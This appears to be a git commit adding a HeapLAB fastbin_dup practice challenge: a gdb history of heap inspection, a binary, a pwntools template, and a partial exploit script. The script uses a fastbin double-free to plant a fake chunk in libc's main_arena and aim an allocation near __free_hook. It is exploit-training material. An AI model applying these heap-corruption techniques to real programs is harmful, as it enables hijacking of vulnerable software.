summaryrefslogtreecommitdiff
path: root/HeapLAB/challenge-fastbin_dup
diff options
context:
space:
mode:
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup')
-rw-r--r--HeapLAB/challenge-fastbin_dup/.gdb_history256
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py83
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/fastbin_dup_2bin0 -> 15792 bytes
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/pwntools_template.py60
4 files changed, 399 insertions, 0 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
new file mode 100644
index 0000000..b2cbfcb
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -0,0 +1,256 @@
+x &main_arena
+x/100x &main_arena
+print main_arena
+fastbins
+q
+fastbins
+fastbins
+c
+exit
+quit
+quit
+fastbins
+print main_arena
+q
+print main_arena
+q
+vis_heap_chunks
+print main_arena
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+x main_arena.top
+x &main_arena.top
+db &main_arena 100
+c
+fastbins
+print main_arena
+x main_arena.fasbinsY
+x &main_arena.fastbinsY
+quit
+fastbins
+x 0x7f0946700b70
+db 0x7f0946700b70 100
+q
+fastbins
+q
+fastbins
+q
+fastbinsx
+db &main_arena 100
+q
+db 0x7f2e5c845b60
+0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70
+x 0x7f2e5c845b70
+x 0x7f2e5c845b60
+vis_heap_chunks
+db 0x7f0ba6e3db70
+db 0x555bdeaca000 100
+db 0x7f0ba6e3db70
+db 0x7f0ba6e3db70 - 8
+db 0x7f0ba6e3db70-8
+db 0x7f0ba6e3db70-7
+q
+x 0x7fcf882cbb69
+db 0x7fcf882cbb69
+q
+vis_heap_chunks
+print main_arena
+q
+print main_arena
+vis_heap_chunks
+q
+print main_arena
+q
+print main_arena
+fastbins
+r
+q
+r
+c
+fastbisn
+vis_heap_chunks
+fastbins
+quit
+fastbins
+print main_arena
+c
+print main_arena
+q
+print main_arena
+print main_arena
+x malloc_free_hook
+x __free_hook
+x &__free_hook
+x &__free_hook 100
+db &__free_hook 100
+q
+q
+q
+q
+print main_arena
+db 0x7f4858584e10
+c
+print victim
+q
+fastbins
+c
+x idx
+x chunksize(p)
+x chunksize
+x p
+fastbins
+q
+x __free_hook
+x &__free_hook 100
+db &__free_hook 100
+db &__free_hook - 100
+db &__free_hook-100
+db &__free_hook-100 100
+print main_arena
+x 0x7fca0f75fe10
+x/100 0x7fca0f75fe10
+x/100 0x7fca0f75fe10-100
+c
+q
+break malloc
+c
+fastbins
+x __free_hook
+fastins
+fastbins
+print main_arena
+x 0x7f072b59ee10
+break malloc
+break free
+continue
+c
+c
+c
+print main_arena
+vis_heap_chunks
+vis_heap_chunks
+c
+vis_heap_chunks
+break free
+break malloc
+c
+print main_arena
+x &__free_hook - 16
+q
+print main_arena
+vis_heap_chunks
+c
+c
+c
+q
+db __malloc_hook
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+c
+break sysmalloc
+c
+frame 2
+context
+c
+break main
+c
+q
+x &__malloc_hook
+print __malloc_hook
+print &__malloc_hook
+print __main_arena
+print main_arena
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100 (100*8)+1
+fastbins
+c
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook-100 (100*8)+1
+c
+db &__malloc_hook-100 (100*8)+1
+print main_arena
+x 0x7f5b07a18b40
+break malloc
+c
+c
+c
+q
+break __libc_malloc
+break malloc
+break __malloc_hook
+b __malloc_hook
+b &__malloc_hook
+b *__malloc_hook
+b *&__malloc_hook
+c
+delete 3
+c
+pwndbg heap
+vis_heap_chunks
+print __mallinfo
+x __mallinfo
+print &__mallinfo
+print *__mallinfo
+print __mallinfo
+print &__mallinfo
+print main_arena
+c
+break malloc
+c
+x main_arena.top_check
+x main_arena.top_chunk
+print main_arena
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+fastbins
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
+x &main_arena
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
+q
+print __malloc_hook
+print __malloc_hook
+fastbins
+c
+fastbins
+c
+vis_heap_chunks
+c
+fastbins
+r
+c
+fastbins
+print main_arena
+vis_heap
+c
+fastbins
+fastbins
+c
+fastbins
+r
+c
+ quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
new file mode 100755
index 0000000..191cbea
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+context.terminal = ['kitty', 'bash', '-c']
+
+gs = '''
+continue
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+#13 chunks
+
+chunk1 = malloc(24, 'abcd')
+chunk2 = malloc(24, 'abcc')
+
+free(chunk1)
+free(chunk2)
+free(chunk1)
+
+#malloc(24, p64(libc.sym.main_arena + 96))
+#this sets up a fake size field in the fastbins
+malloc(24, p64(0x81))
+malloc(24, 'asdf')
+malloc(24, 'asdf')
+
+chunk_b1 = malloc(119, 'asdf')
+chunk_b2 = malloc(119, 'asdf')
+
+free(chunk_b1)
+free(chunk_b2)
+free(chunk_b1)
+
+fake_chunk_loc = libc.sym.main_arena + 8 # begining of fastbin array
+
+malloc(119, p64(fake_chunk_loc))
+malloc(119, 'asdf')
+malloc(119, 'sdfg')
+
+#8 * 9
+
+malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+
+print(hex(fake_chunk_loc))
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
new file mode 100755
index 0000000..faa0249
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
Binary files differ
diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..1faaaf8
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+#gs = '''
+#continue
+#'''
+gs = '''
+break main
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request two 0x50-sized chunks.
+chunk_A = malloc(0x48, "A"*8)
+chunk_B = malloc(0x48, "B"*8)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive()